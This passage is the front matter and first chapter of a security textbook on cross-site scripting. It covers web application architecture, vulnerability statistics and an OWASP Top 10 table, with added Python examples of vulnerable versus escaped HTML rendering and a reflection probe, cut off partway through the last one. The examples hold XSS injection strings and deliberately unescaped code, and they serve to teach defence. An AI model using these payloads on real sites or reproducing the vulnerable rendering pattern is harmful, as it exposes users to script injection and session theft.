Cross-Site Scripting Attacks

Security, Privacy, and Trust in Mobile Communications

About the Series

Similar to computers, the mobile landscape is also facing various security and privacy related threats. Increasing demand for sophisticated handheld mobile devices, including smartphones, tablets, and so forth, is making them an attractive target of security threats. Since these devices store confidential data of the end users, and exploitation of vulnerabilities in the underlying technologies can create havoc on a massive scale, it becomes essential to understand and address the threats associated with them and to analyze the level of trust that can be established for mobile communication scenarios.
This series will present emerging aspects of the mobile communication landscape, and focuses on the security, privacy, and trust issues in mobile communication based applications. It brings state-of-the-art subject matter for dealing with the issues associated with mobile and wireless networks. This series is targeted at researchers, students, academicians, and business professionals in the field.
If you’re interested in submitting a proposal for a book to be included in the series, please email [email protected]

Series Editors:
Brij B. Gupta

Computer and Cyber Security
Principles, Algorithm, Applications, and Perspectives
Brij B. Gupta

Smart Card Security
Applications, Attacks, and Countermeasures
B.B. Gupta, Megha Quamara

Cross-Site Scripting Attacks
Classification, Attack and Countermeasures
B.B. Gupta and Pooja Chaudhary

For more information about this series please visit: https://www.crcpress.com/Security-Privacy-and-Trust-in-Mobile-Communications/book-series/SPTMOBILE
Cross-Site Scripting Attacks
Classification, Attack, and Countermeasures

B. B. Gupta and Pooja Chaudhary


First edition published 2020
by CRC Press
6000 Broken Sound Parkway NW, Suite 300,
Boca Raton, FL 33487-2742

© 2020 Taylor & Francis Group, LLC

CRC Press is an imprint of Taylor & Francis Group, LLC

International Standard Book Number-13: 978-0-367-36770-1 (hbk)

Reasonable efforts have been made to publish reliable data and information, but the author and publisher cannot assume responsibility for the validity of all materials or the consequences of their use. The authors and publishers have attempted to trace the copyright holders of all material reproduced in this publication and apologize to copyright holders if permission to publish in this form has not been obtained. If any copyright material has not been acknowledged please write and let us know so we may rectify in any future reprint.

Except as permitted under U.S. Copyright Law, no part of this book may be reprinted, reproduced, transmitted, or utilized in any form by any electronic, mechanical, or other means, now known or hereafter invented, including photocopying, microfilming, and recording, or in any information storage or retrieval system, without written permission from the publishers.

For permission to photocopy or use material electronically from this work, access www.copyright.com or contact the Copyright Clearance Center, Inc. (CCC), 222 Rosewood Drive, Danvers, MA 01923, 978-750-8400. For works that are not available on CCC please contact [email protected]

Trademark notice: Product or corporate names may be trademarks or registered trademarks, and are used only for identification and explanation without intent to infringe.

Visit the Taylor & Francis Web site at
http://www.taylorandfrancis.com
and the CRC Press Web site at
http://www.crcpress.com
Dedicated to my parents and family for their
constant support during the course of this book
—B. B. Gupta
Dedicated to my parents, siblings, and my mentor
for their guidance and motivation throughout
the journey of completion of this book.
—Pooja Chaudhary
Contents

List of Figures, xiii
List of Tables, xvii
Preface, xix
Acknowledgments, xxiii
Author Bio, xxv

CHAPTER 1 ◾ Security Flaws in Web Applications 1
1.1 WEB APPLICATION VULNERABILITIES 1
1.1.1 Fundamentals of Web Application Architecture 2
1.1.2 Background and Motivation 3
1.1.3 Related Statistics 6
1.2 DIFFERENT DOMAIN-CENTRIC WEB APPLICATION VULNERABILITIES 11
1.3 COMPREHENSIVE DETAIL OF MOST DANGEROUS VULNERABILITIES 13
1.3.1 Overview of Web Application Vulnerabilities 15
1.3.2 Risk Path Assessment 15
1.3.3 Mapping Vulnerabilities with Risk Rating Methods 18
1.4 TOWARD BUILDING SECURE WEB APPLICATIONS 19
1.5 CHAPTER SUMMARY 24
REFERENCES 25

CHAPTER 2 ◾ Security Challenges in Social Networking: Taxonomy and Statistics 29
2.1 INTRODUCTION 29
2.1.1 Statistics of Social Networking 30
2.1.2 Recent Incidences on Social Networking Platform 31
2.2 DISTINCT ATTACK CLASSES OF SOCIAL PLATFORM 35
2.3 SOCIAL NETWORK DESIGN VS. PRIVACY AND SECURITY GOALS 37
2.4 SOLUTIONS TO PREVENT AGAINST SOCIAL MEDIA ATTACKS 45
2.5 CHAPTER SUMMARY 45
REFERENCES 49

CHAPTER 3 ◾ Fundamentals of Cross-Site Scripting (XSS) Attack 53
3.1 OVERVIEW OF CROSS-SITE SCRIPTING (XSS) ATTACK 53
3.1.1 Steps to Exploit XSS Vulnerability 54
3.1.2 Recent Incidences of XSS Attack 55
3.2 EFFECTS OF XSS ATTACK 55
3.3 CLASSIFICATION OF XSS ATTACK 57
3.3.1 Persistent XSS Attack 57
3.3.2 Non-Persistent Attack 59
3.3.3 DOM-Based XSS Attack 60
3.4 APPROACHES TO DEFEND AGAINST XSS ATTACK 60
3.4.1 Client-Side Approaches 66
3.4.2 Server-Side Approaches 66
3.4.3 Combinational Approaches 66
3.4.4 Proxy-Based Approaches 66
3.5 CHAPTER SUMMARY 68
REFERENCES 71

CHAPTER 4 ◾ Clustering and Context-Based Sanitization Mechanism for Defending against XSS Attack 75
4.1 INTRODUCTION 76
4.1.1 Views 76
4.1.2 Access Control List (ACL) 77
4.1.3 Context-Based Sanitization 77
4.2 PROPOSED APPROACH 78
4.2.1 Abstract Design 78
4.2.2 Detailed Design 79
4.2.2.1 Training Phase 80
4.2.2.2 Recognition Phase 80
4.2.3 Key Modules 84
4.3 EXPERIMENTAL TESTING AND EVALUATION RESULTS 89
4.3.1 Implementation Details 92
4.3.2 Categories of XSS Attack Vectors 92
4.3.3 Detection Outcome 95
4.4 PERFORMANCE ANALYSIS 97
4.4.1 Using F-Measure 97
4.4.2 Using F-test Hypothesis 99
4.4.3 Comparative Analysis 103
4.5 CHAPTER SUMMARY 103
REFERENCES 105

CHAPTER 5 ◾ Real-World XSS Worms and Handling Tools 109
5.1 OVERVIEW OF XSS WORM 109
5.1.1 Real-World Incidences of XSS Worm 110
5.1.2 Case Study of the Famous Samy Worm 111
5.2 LIFE CYCLE OF XSS WORM 113
5.3 CATEGORIES OF XSS WORM 114
5.3.1 Exponential XSS Worm 115
5.3.2 XSS Flash Worm 115
5.3.3 Linear XSS Worm 117
5.4 HANDLING TOOLS 117
5.5 CHAPTER SUMMARY 117
REFERENCES 121

CHAPTER 6 ◾ XSS Preventive Measures and General Practices 125
6.1 INTRODUCTION 125
6.2 XSS PREVENTION SCHEMES 126
6.2.1 Filtering 128
6.2.2 Escaping 128
6.2.3 Sanitization 130
6.2.4 Use Content Security Policy (CSP) 130
6.2.5 Data Validation 131
6.3 DIFFERENT PRACTICES FOR BROWSER SECURITY 131
6.4 OPEN RESEARCH DIRECTIONS 134
6.5 CHAPTER SUMMARY 136
REFERENCES 136

INDEX, 139
List of Figures

Figure 1.1 Percentage of web application as per vulnerability severity level 4
Figure 1.2 Percentage of web application developed using programming languages 5
Figure 1.3 Average number of vulnerabilities in each web application as per severity level 6
Figure 1.4 Vulnerabilities found in the latest developing technologies 7
Figure 1.5 Vulnerabilities found during static testing (in %) 8
Figure 1.6 Vulnerabilities found during dynamic testing (in %) 9
Figure 1.7 Vulnerabilities detection rate SAST vs. DAST (in %) 10
Figure 1.8 Top 10 web application vulnerabilities 11
Figure 1.9 Percentage of web applications corresponding to different industries 12
Figure 1.10 Percentage of web applications with security level 13
Figure 1.11 Average number of attacks on different industries 14
Figure 1.12 Consequences of attacks on users 14
Figure 1.13 A scenario depicting risk path exploitation 18
Figure 2.1 Prominent services of OSN 30
Figure 2.2 Popularity of OSN among internet users 31
Figure 2.3 Number of users engaged by different social media platforms 32
Figure 2.4 Percentage of users by age group by Pew Research Center 33
Figure 2.5 Total number of vulnerabilities detected on social media platforms 33
Figure 2.6 Vulnerabilities detected on Twitter platform 34
Figure 2.7 Malware families identified on social media (%) 36
Figure 2.8 Classes of social media attacks 37
Figure 3.1 Persistent XSS attack 59
Figure 3.2 Non-persistent XSS attack 60
Figure 3.3 DOM-based XSS attack 61
Figure 4.1 Abstract design view of the proposed approach 79
Figure 4.2 Detailed design view of the proposed approach 81
Figure 4.3 Flow chart of the proposed approach 83
Figure 4.4 Algorithm for clustered template generation 87
Figure 4.5 Algorithm of context-sensitive sanitization 90
Figure 4.6 Detection rate of the proposed approach on different testing platforms 91
Figure 5.1 Number of users infected by different worms 112
Figure 5.2 Stages during the life cycle of the XSS worm 114
Figure 6.1 Increase in the XSS vulnerability with years 127
List of Tables

Table 1.1 Brief Description of Web Application Vulnerabilities 16
Table 1.2 Evaluation Scheme of Risk Path Identified 18
Table 1.3 Mapping of Web Application Vulnerabilities with Risk Path 20
Table 1.4 Evaluation of Web Application Vulnerabilities against Risk Factors 24
Table 2.1 Description of Social Media Attacks 38
Table 2.2 Different Techniques to Prevent against Social Media Attacks 46
Table 3.1 Recent Incidences of XSS Attack 56
Table 3.2 Effects of XSS Attack 58
Table 3.3 Client-Side Defensive Approaches against XSS Attack 62
Table 3.4 Server-Side Defensive Approaches against XSS Attack 64
Table 3.5 Combinational Defensive Approaches against XSS Attack 67
Table 3.6 Proxy-Based Defensive Approaches against XSS Attack 69
Table 4.1 Suspicious HTML Elements 80
Table 4.2 List of HTML Elements and Their Contexts 86
Table 4.3 Testing Platforms 92
Table 4.4 Categories of XSS Attack Vectors 93
Table 4.5 Observed Results on Different Testing Platforms 96
Table 4.6 Performance Analysis by Calculating F-Measure 98
Table 4.7 Statistics of XSS Attack Vectors Applied 101
Table 4.8 Statistics of XSS Attack Vectors Detected 102
Table 4.9 Summary of Comparison of Existing XSS Defensive Methodologies with Our Work 104
Table 5.1 Real-World XSS Worm 111
Table 5.2 Tools and Techniques to Defend XSS 118
Table 6.1 HTML Entity Encoding 129
Preface

With the advancements of web development technologies and innovations like the internet of things (IoT), internet services are accessible smoothly even in remote areas. The proliferation of the internet has triggered an abrupt escalation in the utilization of social networks. These networks have interwoven into the daily routine lives of people in the form of virtual platforms, which facilitate ease of communication. Users connect with new loved ones and re-establish lost connections irrespective of geographical location. The data shared by social actors is not only beneficial to different organizations to analyze and maintain a strong customer relationship but also fascinates the attacker, who utilizes it for his/her selfish motives. The highly concentrated topology of social networks, use of advanced features like AJAX and JavaScript, and a strong trust relationship among the social actors are the key characteristics of social sites being targeted by the attacker. These sites have become the hotbed of malicious files affecting the privacy of social media users.
Cross-Site Scripting attack comes under the umbrella of code injection-based vulnerability and is ranked at no. 3 among all the web application-based vulnerabilities. It has contaminated almost 80 percent of the popular web applications over the internet today. Cross-Site Scripting Attacks: Classification, Attack, and Countermeasures provides a detailed study of the XSS attack. This book primarily focuses on the classification of the key contributions of the research work accomplished in the area of XSS. Moreover, this book mainly addresses a novel mitigation technique to protect against the XSS attack. It also sheds light on the open challenges and future research recommendations for further progression in the XSS domain.
Specifically, the chapters contained in this book are summarized as follows:

Chapter 1: Security Flaws in Web Applications—This chapter primarily focuses on the various types of security issues and web-based vulnerabilities exploited by the data snooper to launch various types of attacks.
Chapter 2: Security Challenges in Social Networking: Taxonomy and Statistics—This chapter provides a classification of the different types of security attacks specific to the social platforms. It also highlights statistics depicting the usage of social media among internet users, harmful effects of using it on the young generation, and so on.
Chapter 3: Fundamentals of Cross-Site Scripting (XSS) Attack—This chapter provides deep insight into the Cross-Site Scripting attack, its classification, incidences of the XSS attack, and various consequences of the XSS attack. Furthermore, it describes existing defensive methodologies against the XSS attack with their strengths and weaknesses. It also provides a comparative study of all these techniques.
Chapter 4: Clustering and Context-Based Sanitization Mechanism for Defending against XSS Attack—This chapter discusses the various challenges that exist in the state-of-the-art techniques. Later on, it also elaborates an efficient and robust mechanism to thwart XSS attacks on social networks to overcome such challenges to some extent. It also discusses its strengths and limitations.
Chapter 5: Real-World XSS Worms and Handling Tools—This chapter discusses the types of XSS worms that can have a severe impact on the social actors. Moreover, it also describes the different types of tools that aid in detecting and mitigating the XSS attack in web applications.
Chapter 6: XSS Preventive Measures and General Practices—This chapter discusses the general methods and practices which can be applied at the development level of browsers or web applications or both, to safeguard against the XSS attack. It also sheds light on the path for future research by highlighting the existing issues in currently available solutions.
Acknowledgments

First of all, we would like to pay our gratitude to God by bowing our heads for lavishing on us with continuous blessings and enthusiasm for completing this book. Writing a book is not a work of an individual, but it is the outcome of the incessant support of our loved ones. This book is the result of inestimable hard work, continuous efforts, and assistance of loved ones. Therefore, we would like to express our gratefulness to each one of them who are linked with this book directly or indirectly, for their exquisite cooperation and creative ideas for meliorating the quality of this book. Along with this feeling, we would like to appreciate CRC Press, Taylor & Francis Group, staff for their assistance and persistent support. We are grateful, from the bottom of our hearts, to our family members for their absolute love and uncountable prayers. This experience is both internally challenging and rewarding. Therefore, again special thanks to all who helped us in making this happen.

November 2019
B. B. Gupta
Pooja Chaudhary
Author Bio

B. B. Gupta received his PhD degree from Indian Institute of Technology Roorkee, India, in the area of Information and Cyber Security. He has published more than 200 research papers in international journals and conferences of high repute including IEEE, Elsevier, ACM, Springer, Wiley, Taylor & Francis, Inderscience, etc. He has visited several countries, i.e. Canada, Japan, USA, UK, Malaysia, Australia, Thailand, China, Hong Kong, Italy, Spain, etc. to present his research work. His biography was selected and published in the 30th Edition of Marquis Who’s Who in the World, 2012. Dr. Gupta also received the Young Faculty Research Fellowship award from the Ministry of Electronics and Information Technology, Government of India, in 2018. He is also working as a principal investigator of various R&D projects. He is serving as Associate Editor of IEEE Access, IEEE TII, and Executive Editor of IJITCA, Inderscience. At present, Dr. Gupta is working as Assistant Professor in the Department of Computer Engineering, National Institute of Technology, Kurukshetra, India. His research interests include information security, cyber security, mobile security, cloud computing, web security, intrusion detection, and phishing.

Pooja Chaudhary is currently pursuing her PhD degree at National Institute of Technology (NIT), Kurukshetra, Haryana, India, in the Information and Cyber Security area. She completed her Master of Technology (MTech) degree in the area of Cyber Security at National Institute of Technology (NIT), Kurukshetra, Haryana, India. She received her BTech degree in Computer Science and Engineering from Bharat Institute of Technology, Meerut, India, affiliated to Uttar Pradesh Technical University. Her areas of interest include Online Social Network (OSN) security, big data analysis and security, database security and cyber security, and internet of things security. She has published a number of research papers with various reputed publishers, i.e. IEEE, Springer, Wiley, Inderscience, and so on.
CHAPTER 1

Security Flaws in Web Applications

The advancement in technology along with the digitalization of business drives us onto a new span of computing. Innumerable web applications have been designed embracing new and improved features. However, this progress leaves numerous web application vulnerabilities that are destabilizing the secure infrastructure of an organization. Therefore, this chapter concentrates on providing comprehensive details of the most prominent and dangerous vulnerabilities that are contaminating the digital world and affecting businesses worldwide. More elaborately, the authors have encapsulated the related statistics of critical vulnerabilities from reliable sources, giving insights into the security threats corresponding to different business domains. Finally, a comprehensive assessment of the vulnerabilities has been accomplished with respect to a method of rating identified risk paths.

1.1 WEB APPLICATION VULNERABILITIES

Over the past decade, the internet has not only evolved into a digital platform where people can search for anything, but has also become the lifeline of many businesses. Digitalization led to rapid business innovation. Web applications lie at the core of most businesses including the government sector, manufacturing sector, finance sector, and many more [5, 6, 9]. This transformation of business to the digital space helps an organization bring its services to the edge, i.e. into the hands of the user. Consequently, the user can access these services anywhere, anytime, thereby spanning business boundaries. For many organizations, such as e-commerce businesses, the software application is the business itself. Organizations spend huge amounts of money and extensive effort to provide a good digital experience to their customers; however, only protected and safe applications can serve their purpose effectively. Yet developing software components without any vulnerability is still a dream. Instead of developing these software applications as a single isolated component, today organizations use third-party components to develop applications through the integration of discrete components. Thereby, new hidden vulnerabilities exist and are being exploited at a faster rate than the rate at which the organization identifies them and develops patches to fix them [2, 20].

1.1.1 Fundamentals of Web Application Architecture

A web application builds upon multiple modules [19]. It consists of a web server, a web browser, the application logic residing on the server, and the data store working at the backend that is accessed by the application. Complex web applications may include many more modules; however, the basics remain the same.

• Web Server: It is a computer machine that executes web server software to respond to the user’s request. It listens on port 80 (http) or port 443 (https). It basically hosts various web sites’ information including HTML files, style sheets, and JavaScript documents. Example: Microsoft IIS web server [17], Apache Web server [1], etc.

[Figure: the client machine sends a request to the web server software, which hands it to the application logic and returns the response.]

• Web Browser: It is the computer application used to request web content. It is used to retrieve web pages on the World Wide Web (WWW) and display them to the user. Example: Mozilla Firefox, Google Chrome, Safari, etc.
• Application Logic/Information: It is the program logic that processes the user’s request. Basically, it interprets the parameters sent by the browser to achieve its objective. For instance, a PHP interpreter residing at the server side lets it process PHP scripts on the server itself.
• Back-End Data Store: It is the database which stores the information accessed by the application logic. It may be a file-based database, an SQL database, etc. It is usually located on a different machine than the web server, connected through a network.

1.1.2 Background and Motivation

It was discovered by the Web Application Vulnerabilities Statistics report, in 2017, that of the total vulnerabilities reported, 17% were highly severe vulnerabilities, 69% were moderately severe, and 14% came under the category of low-severity vulnerabilities [21]. These vulnerabilities can cause major financial and technical impacts to the organization depending upon the severity level they lie in. Software applications may comprise vulnerabilities of different severity levels. Figure 1.1 depicts the statistics of an application containing vulnerabilities corresponding to their severity levels. There was an increase in highly severe vulnerabilities of 5% in 2018 as compared to 2017. Use of untrusted third-party components or use of outdated components may be the major cause for the exploitation of embedded vulnerabilities, for example, use of default configuration or use of older versions of software. Therefore, it is quite clear that more effort has to be put into either developing secure and effective software applications by incorporating secure coding practices in the development phase, or designing and deploying defensive mechanisms to detect these flaws.

FIGURE 1.1 Percentage of web application as per vulnerability severity level.
The advancement of web design technologies is a great force in developing dynamic and more user-friendly applications. Moreover, the emergence of Industry 4.0 and the progression of the World Wide Web incorporated a wide range of technologies including client-side technology, server-side technology, and advanced protocols.
Use of technologies like HTML5, AJAX, and JavaScript makes applications more versatile in nature. Irrespective of the context, every organization depends on software applications for business expansion. These web applications are developed using different programming platforms like PHP, Java, ASP.NET, and others. PHP is the most widely used technology for designing applications [16]. Figure 1.2 shows that almost 44% of web applications are designed using PHP as the base language, 26% are based on ASP.NET, and so on. The Other category includes languages like Python, Ruby, etc. Also, it has been noted here that PHP and ASP.NET are the widely used technologies for web application development nowadays. Even though web applications play a crucial role in the extension of the business, they contain some hidden flaws that the attacker might exploit. These flaws may be categorized as high, medium, and low severity level depending upon their impact on the web application if the attacker exploits them. Figure 1.3 shows the average number of vulnerabilities corresponding to each severity level identified in each web application developed using one of the programming languages like PHP, ASP.NET, Java, and others [15].

FIGURE 1.2 Percentage of web application developed using programming languages.
FIGURE 1.3 Average number of vulnerabilities in each web application as per severity level.

Development tools like PHP, ASP.NET, and Java are in trend for designing web applications for any organization including the government sector, finance, manufacturing, IT, mass media, and so on. Figure 1.4 reveals some statistics on the number of vulnerabilities detected in web applications developed using these tools and technologies over the years [3]. It is also noted here that there has been a continuous fall in the number of vulnerabilities found in web applications developed using PHP since 2016, meaning patches have been developed for mitigating vulnerabilities; however, complete eradication of vulnerabilities from applications is still a dream due to heterogeneity.

1.1.3 Related Statistics

There exist various vulnerabilities which are continuously tainting web applications belonging to every domain; however, a report by White Hat Security in 2017 [23] labels some of the frequently found vulnerabilities. Identification of these vulnerabilities depends on the type of assessment employed. To perform effective security assessment, organizations employ both static and dynamic testing in tandem.

FIGURE 1.4 Vulnerabilities found in the latest developing technologies.

Static testing refers to analyzing the software application to identify any kind of security flaw during the development phase itself. It may be of high, medium, or low severity. Figure 1.5 reflects the major classes of vulnerabilities found during static testing of web applications. Unpatched libraries and application misconfiguration are the two most prevalent web application vulnerabilities, because developers nowadays utilize the concept of modular programming, where each module is reusable and easily accessible but is less secure and uses the default configuration as provided by its developer.
Recently, to discover more flaws, dynamic testing of the application has become popular. Dynamic testing of the web application is performed while the application is running in a real environment, to detect those vulnerabilities which remain unidentified during static testing. It is essential to perform this testing so that more and more vulnerabilities can be identified, thus yielding a more secure and robust application. Figure 1.6 shows the major classes of vulnerabilities which get identified in dynamic testing [18].

FIGURE 1.5 Vulnerabilities found during static testing (in %).
FIGURE 1.6 Vulnerabilities found during dynamic testing (in %).

Comparing the static testing and dynamic testing results, it is found that the prominent vulnerabilities of static testing are not among the vulnerabilities found during dynamic testing. However, Cross-Site Scripting (XSS) [4] appears in the results of both kinds of testing, which makes it the most dangerous vulnerability. This means that developers left loopholes that let XSS pave its way into web applications. Consequently, mitigating XSS is of major concern and it is becoming the most dangerous flaw in web applications. Therefore, identification and mitigation of XSS vulnerability is an open research challenge [7, 8, 10–14].
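As an added example (not code from the book), the following Python sketch puts the components of Section 1.1.1 and the static-versus-dynamic contrast above into working form: a minimal request pipeline whose rendering logic is written once without output encoding and once with it, and a black-box probe of the kind a DAST tool runs, which sends a canary through the handler and checks whether the response parses to an injected element. The URL, function names and canary string are assumptions made for this illustration.

```python
"""Reflected parameter handling and a DAST-style reflection probe.

Added example, not code from the book: a stand-in for the "application
logic" box of Section 1.1.1 that renders a search page from the browser's
q parameter, written once without output encoding and once with it, plus
the black-box check a dynamic scanner runs to find the XSS flaw that a
static review of the template can miss.  Function names, the URL and the
canary string are assumptions made for this illustration.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlsplit


def render_search_vulnerable(query: str) -> str:
    """Untrusted text is concatenated straight into an HTML text context
    (the <h1>) and an HTML attribute context (the value="...")."""
    return (
        "<h1>Results for " + query + "</h1>"
        '<input type="text" name="q" value="' + query + '">'
    )


def render_search_hardened(query: str) -> str:
    """Same page; every interpolation is HTML-entity encoded with quote=True,
    so <, >, &, " and ' cannot close the attribute or open a new tag."""
    safe = escape(query, quote=True)
    return (
        "<h1>Results for " + safe + "</h1>"
        '<input type="text" name="q" value="' + safe + '">'
    )


def handle_request(url: str, render) -> str:
    """Minimal request pipeline: parse the URL the browser sent, extract the
    q parameter (parse_qs undoes the percent-encoding) and render a body."""
    params = parse_qs(urlsplit(url).query)
    return render(params.get("q", [""])[0])


class _InjectedTagFinder(HTMLParser):
    """Records start tags carrying an event-handler attribute, i.e. elements
    the browser would execute script from if this markup were rendered."""

    def __init__(self) -> None:
        super().__init__()
        self.injected = []

    def handle_starttag(self, tag, attrs):
        if any(name.lower().startswith("on") for name, _ in attrs):
            self.injected.append((tag, dict(attrs)))


# Canary sent by the probe (constructed for this example): closes an
# attribute, closes the tag, and opens an element with an event handler.
# "xss7q" is just a marker that makes the reflection easy to find.
CANARY = '"><img src=x onerror=xss7q>'


def dast_reflection_probe(render) -> dict:
    """Black-box check: send the canary as q and inspect what comes back.

    reflected   - the marker appears in the response at all
    unencoded   - the canary survived byte-for-byte (metacharacters intact)
    exploitable - the response now parses to an element with an on* handler
    """
    url = "https://app.example/search?q=" + quote(CANARY, safe="")
    body = handle_request(url, render)
    finder = _InjectedTagFinder()
    finder.feed(body)
    return {
        "reflected": "xss7q" in body,
        "unencoded": CANARY in body,
        "exploitable": bool(finder.injected),
        "injected_tags": [tag for tag, _ in finder.injected],
    }


if __name__ == "__main__":
    for name, render in (("vulnerable", render_search_vulnerable),
                         ("hardened", render_search_hardened)):
        print(name, dast_reflection_probe(render))
```

Run stand-alone, the script reports the vulnerable renderer as reflecting the canary unencoded and yielding two injected img elements, and the hardened one as reflecting only the harmless marker. The probe needs no access to the source, which is why dynamic testing surfaces a flaw like this even after a code review has signed the template off. The encoding shown is correct only for HTML text and quoted-attribute contexts; the same html.escape call would not make the parameter safe inside a script block or a URL attribute, which is the motivation for the context-based sanitization the book develops in Chapter 4.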
For a long period of time, security personnel paid attention only to the development phase, with the perception that they could recognize all the vulnerabilities that might be present in the application; however, it has been observed that only a few vulnerabilities are identified and fixed during the development phase. This raises major security concerns and yields abundant threats to the application when it is in the real environment, giving the attacker an open opportunity to exploit the latent flaws. Figure 1.7 reveals that a major portion of the security errors is found in dynamic testing as compared to static testing [23]. It is shown here that the percentage of vulnerabilities identified and fixed during dynamic testing is large in comparison with static testing, whether they are of high, critical, or medium severity level.

FIGURE 1.7 Vulnerabilities detection rate SAST vs. DAST (in %).
Rapid growth of more innovative and complex application development techniques induces complex applications and raises the difficulty of identifying and resolving vulnerabilities exponentially. Insecure web applications are affecting every domain like e-commerce, manufacturing, IT, public sector, etc. As the risk imposed through the exploitation of latent vulnerabilities in web applications can vary from low to high, it is vital to resolve them early and accurately. Another report, by the Open Web Application Security Project (OWASP) [18], highlights the ten most common vulnerabilities embedded in web applications belonging to almost every sector. Figure 1.8 lists these top 10 vulnerabilities.
These vulnerabilities exist because of many reasons including insecure coding, use of modular programming without security testing of components, use of default configurations, security negligence during the development phase, and many more. Therefore, OWASP provides information regarding the most dangerous existing vulnerabilities, which aids developers, application designers, and organizations to remain updated about these vulnerabilities so that they can be found earlier, thereby reducing the associated risk.

FIGURE 1.8 Top 10 web application vulnerabilities.

1.2 DIFFERENT DOMAIN-CENTRIC WEB APPLICATION VULNERABILITIES

With the development of web 2.0, there has been a surge of dynamic web applications in the digital world of the internet which allow users to interact with them by providing user-specific data. In today’s modern era, the web applications corresponding to each business have become their lifelines. Each enterprise offers its services to its customers via its web applications, including the public sector, banking, e-commerce, IT sector, social media, and any other business. Figure 1.9 highlights the portion of the digital world occupied by different industries through their respective web applications [21].
These web applications pave the way for organizations to approach their customers by offering multiple online services. However, only secure applications can impart these services safely. In 2018, almost 83% of the vulnerabilities identified in web applications were due to insecure coding. Because of technological advancements, web applications are being designed and delivered faster than ever before, affecting their security and attracting attackers to exploit latent vulnerabilities. Figure 1.10 shows that approximately 32% of web applications have been ranked as having a very poor level of security, giving rise to innumerable cyberattacks.

FIGURE 1.9 Percentage of web applications corresponding to different industries.
Despite incorporating security features while developing web applications, various hidden vulnerabilities remain embedded in them. There may be many reasons for the weak security level of web applications, such as ignorance of secure coding, user unawareness, and default configurations, which help attackers trigger new attacks. Figure 1.11 gives a glimpse of the average number of attacks performed on different industries [22].

FIGURE 1.10 Percentage of web applications with security level.

A report [22] identified in 2018 that the consequences of these attacks affect the users of the particular industry. Many web applications process users' credentials and store personal information, and consequently lead to leakage of data. Figure 1.12 shows some of the consequences of attacks on web applications.

1.3 COMPREHENSIVE DETAIL OF MOST DANGEROUS VULNERABILITIES
This section offers a brief overview of the top 10 vulnerabilities unveiled by OWASP [18]. It provides information about the different paths exploited by an attacker to cause damage to an organization. As every sector, including banking, government, e-commerce, finance, healthcare, social media, manufacturing, IT, and telecom, makes greater use of digital platforms to expand its business, all are prone to the various types of vulnerabilities embedded in web applications. Consequently, awareness of these flaws is indispensable while developing applications.

FIGURE 1.11 Average number of attacks on different industries.

FIGURE 1.12 Consequences of attacks on users.

1.3.1 Overview of Web Application Vulnerabilities

In this module, a comprehensive description of the top 10 most dangerous vulnerabilities is given. We have briefly explained each of the web application vulnerabilities by highlighting only the most important factor behind it. Table 1.1 summarizes these vulnerabilities. A proper understanding of each vulnerability, including its root cause and exploitation method, is mandatory to come up with a solution to recognize and defend against it. It is better for an organization to recognize all the latent flaws in a web application early so that the associated risk can be reduced easily or eliminated altogether.

Dealing with these vulnerabilities depends entirely on the awareness of the security personnel. Sometimes it is not easy to develop a defensive solution even if you are familiar with these flaws. The next section illustrates how these vulnerabilities are exploited by the attacker through risk path identification.

1.3.2 Risk Path Assessment

An attacker, i.e. a person with illegitimate intentions, delves into a web application to search for every possible path that could be exploited to inflict severe damage on the victim or targeted organization. Each of these identified paths represents a threat or a risk to the organization. The associated risk may severely affect the organization, which makes it essential to build a robust and reliable web application. Figure 1.13 illustrates the process of path identification and exploitation by an attacker.
To assess the overall risk associated with the exploitation of existing flaws, the probability associated with each factor (threat agents, attack payload, and security controls) has to be evaluated and integrated with the overall impact on an organization. Sometimes these paths can be easily identified during the development phase, but not always. Likewise, the associated damage may vary from no loss to complete loss of business. Therefore, identifying the most dangerous vulnerabilities and proposing mitigation mechanisms is the most pressing current demand.

FIGURE 1.13 A scenario depicting risk path exploitation.

TABLE 1.1 Brief Description of Web Application Vulnerabilities

V1. Injection: An injection attack occurs as a result of the relay of malicious data by the attacker as a command or query, which gets interpreted at the victim's browser, resulting in the alteration of information flow or theft of sensitive data without user consent.

V2. Broken Authentication: This vulnerability gives the attacker the ability to either bypass or breach the authentication mechanisms employed by the web application. Consequently, the attacker might get access to user credentials, session tokens, and IDs to impersonate the legitimate user.

V3. Sensitive Data Exposure: This attack results from the loss of confidentiality between user and web application. It results in the theft of sensitive data like passwords, healthcare, and financial information by the attacker to trigger crimes like credit card fraud, cyber social clones, etc.

V4. XML External Entities (XXE): XML allows a user to refer to external resources in an XML document, which get substituted into the document by the XML parser during its execution. This vulnerability is utilized by an attacker to trick the XML parser into retrieving resources of his interest. External entities may be capable of scanning internal ports, revealing sensitive data, performing server-side request forgery, and denial of service attacks.

V5. Broken Access Control: Users are allowed to perform their functions according to the assigned privileges. This is enforced through access control policies. When these policies are not properly enforced, the attacker compromises the entire web application's security by gaining admin privileges, modifying the access rights of other users, and misusing confidential information for their own selfish motives.

V6. Security Misconfiguration: This type of vulnerability arises due to insecure configurations that are typically left at their defaults in an application. An attacker can easily identify them through unpatched flaws, unprotected files, directories, etc., paving the way for other serious attacks.

V7. Cross-Site Scripting (XSS): A type of code injection vulnerability which exists due to improper validation of the data injected by any user. This flaw is exploited by the attacker to inject malicious scripting code into the web application which, when processed by the parser, results in account hijacking, session token stealing, and redirection to the attacker's site.

V8. Insecure Deserialization: This vulnerability occurs due to improper deserialization. Deserialization is the process of converting formatted data into objects. This vulnerability is utilized by the attacker to trick the deserializer into processing untrusted data, resulting in remote code execution, denial of service, privilege escalation, etc.

V9. Using Components with Known Vulnerabilities: A web application may include various components like libraries and frameworks to serve user requests. These components always run with the same privileges as the application. If a vulnerable component is employed, the attacker may exploit the weakness to gain control of the entire system or cause data loss.

V10. Insufficient Logging and Monitoring: This is basically an opportunity for the attacker to infect the system with the same strategy used earlier, as these systems do not maintain proper logs or monitor network activities. It results in tampering or data loss and sometimes control over the entire system.
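The V7 row of Table 1.1 locates the cross-site scripting flaw in data that reaches the HTML parser without validation or encoding. The following Python snippet is an added illustration, not code from the book or from any project it cites: it places the "before" form (untrusted text concatenated straight into HTML) beside the hardened form (entity encoding chosen for the HTML body and attribute contexts) and runs both over a constructed sample comment. The function names, the `<div class="comment">` template and the sample input are assumptions made for the example.

```python
import html

# Constructed sample input (not from the book): what an untrusted comment
# field might carry. The marker script is the standard test probe, used here
# only to check that output encoding neutralises it.
UNTRUSTED_COMMENT = "<script>alert('xss')</script>"


def render_comment_vulnerable(comment: str) -> str:
    """'Before' form (the V7 flaw): untrusted text is concatenated into HTML
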